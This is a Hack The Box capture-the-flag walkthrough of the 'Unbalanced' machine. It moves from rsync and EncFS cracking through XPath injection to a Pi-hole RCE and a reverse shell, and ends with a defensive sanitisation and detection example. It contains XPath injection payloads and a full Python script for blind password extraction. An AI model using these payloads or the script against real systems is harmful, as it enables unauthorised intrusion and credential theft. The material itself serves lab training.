Unbalanced — HTB Walkthrough
Well, this was a genuinely hard machine and it required a lot of nudges and help. It also took some scripting, XPath injection and a hell of a ride. Without wasting time, let's start.
ENUMERATION
An Nmap scan of Unbalanced with default scripts and service version detection shows the open ports.
Port 873 Rsync Enumeration
Using the guide at https://book.hacktricks.xyz/pentesting/873-pentesting-rsync we can list the shares. One of them is conf_backups, described as EncFS-encrypted configuration backups.
Enumerating conf_backups shows that no authentication is required, so we can list the share and copy its contents.
To list what is in conf_backups:
Now we download all the files into a folder on our machine:
We now have all the files on our local system.
Determining the file type of each one, I see only data.
But among all these there is an XML file, which looks like the low-hanging fruit, so let's examine it.
Opening this XML file shows us what encryption is used.
So we have the encryption type and all the details needed to decrypt it. It is an EncFS-encrypted file system.
Let us try to decrypt it.
But, as you can see, we will need the secret password for that. So we will try to crack the password using john.
Encfs2John
We pass the whole folder copied with rsync (named encrypted) to encfs2john.
A hash file is created in the unbalanced folder.
Now we use rockyou.txt to crack it.
We have got the password: bubblegum. Now let us create a decrypted file system. For this we will first create an encrypted directory on
We got the decrypted file system. How?
EncFS uses the same syntax for both encryption and decryption.
We use the file system by mounting it: we point encfs at ROOTDir (the directory we want encrypted) and tell it to create an encrypted file system under the name encrypted, supplying a password from which the AES key is derived together with a salt.
This writes every file in encrypted form and keeps an .encfs6.xml file holding the salt and key data needed for AES decryption.
If we have lost the password, the only way in is to brute-force it, which is what we did above with JTR.
Now we run encfs again, specifying the encrypted and decrypted file systems on ROOTDir, and supply the cracked password. This recreates the missing decrypted view, and thus we have recovered our plaintext files. Let's go back to enumeration.
After I cracked the files, I started enumerating them.
1) squid.conf has:
a. Domain name
b. cachemgr password: Thah$Sh1
Let's add intranet.unbalanced.htb to the hosts file and move on to Squid enumeration.
PORT 3128 Squid Proxy Enumeration
1) cat /etc/proxychains.conf
2) In the browser, using FoxyProxy, I made a proxy named Joker with host 10.10.10.200 and port 3128.
Then we access intranet.unbalanced.htb.
I tried entering the username cachemgr, Manager or root with the password Tha$Sha1.
After trying to log in and doing some enumeration on the website I found nothing much, so I asked for a hint and was told to use squidclient to see what else can be done with the manager password.
So we will access the mgr menu, and for this we will use squidclient.
We see that any query to disabled status vectors doesn't work, so I tried enumerating each protected data item.
The fqdn page revealed the following:
What it tells us is the presence of two new hosts. Similarly, I enumerated objects.
We see an admin page present on the website hosted on 172.31.11.3.
We also see pihole.unbalanced.htb, with version info: Pi-hole Version v4.3.2, Web Interface Version v4.3, FTL Version v4.3.1.
We also notice that 172.31.179.1 is not there. Browsing to it shows the site was taken down for security reasons.
On browsing to intranet.php we find the same page, but this page will be vulnerable, as this host is mentioned to be
Then I tried some simple SQL attacks, which looked like they were working, but something was missing, as if the syntax was not what we expected. Digging further led to XPath injection.
https://www.scip.ch/en/?labs.20180802
Username : ' or 1=1 or ''='
Password : Thah$Sha1 or anything
This revealed all usernames.
Now, to guess the password, we first determine its length.
Username : Bryan
Password : '] | //*[1][string-length(Password) = '7'] | /foo[bar'=
We will do trial and error on the password length; for this we need a Python script that sends the length payload, increasing the value by one each time.
For this, capture the request in Burp to see the request format.
Now we make the script.
Script
#!/usr/bin/env python3
import requests
import string

characters = string.printable
http_proxy = "http://10.10.10.200:3128"
proxy_dict = {"http": http_proxy}
target_url = "http://172.31.179.1/intranet.php"
password = ""
end = " "
user_no = 3  # Change this to the user number you want
password_length = 0


def send_request(payload):
    # Send the injected value in the Password field through the Squid proxy
    data = {"Username": "manager", "Password": payload}
    response = requests.post(target_url, data=data, proxies=proxy_dict)
    return response


# Step 1: find the password length, one value at a time
for length in range(1, 101):
    print("\rTrying :" + str(length), end=end)
    length_payload = "'] | //*[" + str(user_no) + "][string-length(Password) = " + str(length) + "] | /foo [bar = '"
    temp = send_request(length_payload)
    if "Invalid credentials." not in temp.text:
        password_length = length
        print("\nLength of the password is : " + str(length) + "\n")
        break

# Step 2: recover each character position in turn
for i in range(1, password_length + 1):
    for j in characters:
        if j != "'":
            print("\rChecking position " + str(i) + " for character: " + str(j), end=end)
            payload = "']|//*[" + str(user_no) + "][substring(Password," + str(i) + ",1) = '" + str(j) + "'] | /foo [bar = '"
            response = send_request(payload)
            if "Invalid credentials." not in response.text:
                print("\nPassword's " + str(i) + " character is : " + str(j))
                password = password + str(j)
                break

print("\nThe password is : " + str(password))
Username: bryan, Password: ireallyl0vebubblegum!!!
Great, so I tried SSH and got a shell.
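Added defender-side example, not code from the write-up or from the box: a hypothetical reconstruction of the concatenated XPath behind intranet.php, the allow-list plus XPath string-literal quoting that neutralises the payloads above, and a regex that flags the blind string-length/substring probes in constructed proxy log lines. The Employee element name, the field names and the log format are assumptions.

```python
import re

# Hypothetical reconstruction of the concatenated query behind intranet.php
# (assumption: the real XPath is not shown in the write-up).
def vulnerable_query(username, password):
    """Builds the XPath by string concatenation: the injection point."""
    return ("//Employee[Username/text()='" + username +
            "' and Password/text()='" + password + "']")

def xpath_literal(value):
    """Embed untrusted text as an XPath 1.0 string literal that can never
    close early. XPath has no escape character, so a value containing both
    quote kinds is assembled with concat()."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join("'" + p + "'" for p in parts) + ")"

# Allow-list for usernames: no quotes, brackets or operators get through.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")

def safe_query(username, password):
    """Allow-list the username and embed both values as literals."""
    if not USERNAME_RE.match(username):
        raise ValueError("username rejected by allow-list")
    return ("//Employee[Username/text()=" + xpath_literal(username) +
            " and Password/text()=" + xpath_literal(password) + "]")

# Markers of the blind, one-character-at-a-time extraction the script performs.
BLIND_XPATH_RE = re.compile(r"(string-length|substring)\s*\(|\|\s*//\*\[", re.I)

# Constructed (already URL-decoded) proxy log lines, not captured from the box.
SAMPLE_LOG = [
    "10.10.14.18 POST /intranet.php Username=bryan&Password=Thah$Sha1",
    "10.10.14.18 POST /intranet.php Username=manager&Password='] | //*[3]"
    "[string-length(Password) = 7] | /foo [bar = '",
    "10.10.14.18 POST /intranet.php Username=manager&Password=']|//*[3]"
    "[substring(Password,1,1) = 'i'] | /foo [bar = '",
]

def flag_blind_xpath(log_lines):
    """Return the 1-based numbers of log lines carrying those markers."""
    return [n for n, line in enumerate(log_lines, 1) if BLIND_XPATH_RE.search(line)]

if __name__ == "__main__":
    print(vulnerable_query("' or 1=1 or ''='", "x"))   # predicate becomes always-true
    print(safe_query("bryan", "' or 1=1 or ''='"))      # payload stays inside a literal
    print(flag_blind_xpath(SAMPLE_LOG))                  # [2, 3]
```

Where the XPath engine supports variables (lxml's xpath(..., u=..., p=...), for example), binding them is preferable to building literals by hand.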
EXPLOITATION
Enumerating further:
So we see two things here:
1) The remaining task for the users is to put intranet-host 1 back into the load balancer
2) To set up the Pi-hole server
   a. Juicy info: Pi-hole is running on the local interface
   b. Pi-hole has an admin password set somewhere
I ran dpkg -l to list all the packages and saw that wget was available, so I transferred netstat from my Kali box to the machine.
On the attacker machine:
On the victim machine:
We can see two ports bound to localhost, and one of them is Docker. So we transferred ifconfig the same way we did netstat.
Running ifconfig shows Docker is on interface 172.17.0.1, but according to the to-do list, Pi-hole is accessible only through localhost.
So now we will try to set up an SSH tunnel. First I tried to set up the tunnel from Kali using local port forwarding:
ssh -L 8888:127.0.0.1:8080 bryan@10.10.10.200
Browsing to 127.0.0.1:8888 gave me:
I wasn't convinced. I thought there might be some tunneling issue, such as the wrong direction, so I tried a reverse tunnel from the victim machine.
For this we need to add our Kali public key to authorized_keys on the victim machine.
First create the directory .ssh in bryan's home folder, then transfer your authorized_keys to the victim's .ssh folder.
First create SSH keys on Kali using ssh-keygen, if not already done, then:
on the attacker machine:
and on the victim machine:
Make sure the SSH server is running on Kali.
Port forwarding
In the netstat output we can see that 10.10.10.200 has established an SSH connection to 10.10.14.18 port 22. Browsing to the server:
Now that we have the Pi-hole page, we can look for the exploit for Pi-hole 4.3.2, which is an authenticated RCE. To use it we need to authenticate ourselves, so we enumerate the admin username and password on the machine.
1) I tried all the basic Pi-hole files, like /usr/local/bin/pihole and /etc/pihole, but there was nothing.
2) There was also a docker folder in /etc/ which had key.json. I looked for something useful but found nothing of interest.
After all this I went back to the TODO and found:
1) set temporary admin password
   a. First I tried user pi, password raspberry
2) Then I realised I was being dumb: it was admin that was the password.
Authenticate to the Pi-hole page.
Now, to exploit the RCE, just download the Python script from here:
https://www.exploit-db.com/exploits/48727
and run it on the attacker machine.
PRIVILEGE ESCALATION
Enumerating for root
I found a web password, nothing much. We will use this:
https://frichetten.com/blog/cve-2020-11108-pihole-rce/#pk_campaign=github
First open Settings -> Blocklist and disable all the present blocklists.
Then add the new URL.
Open a netcat listener on port 80 on the attacker machine, then click Save and Update.
We receive a response on netcat.
Now we send the data as follows, hit Enter twice, then Ctrl+C.
As soon as we hit Ctrl+C, we get the following output on the server.
Now we again set a netcat listener on port 80
and click “Update” to update Gravity a second time. This time you should see “.domains” in the response. This is indicative you have performed the exploit correctly up to this point. Hit enter, and then paste whatever PHP payload you’d like. A shell function call works very nicely. Then hit Ctrl+c to kill netcat.
The PHP code above is php-reverse-shell.php from pentestmonkey. Now we start our listener on port 1234.
Then we press Ctrl+C on the HTTP response. We see the following on the server:
Now we run the pihole password-change command as www-data
and on netcat:
I downloaded both files to my system.
on the attacker machine:
Opening both files, I found a password in pihole_config.sh.
Then I used su root, entered this password, and we get root.
bUbBl3gUm$43v3Ry0n3!
ROOTED !!!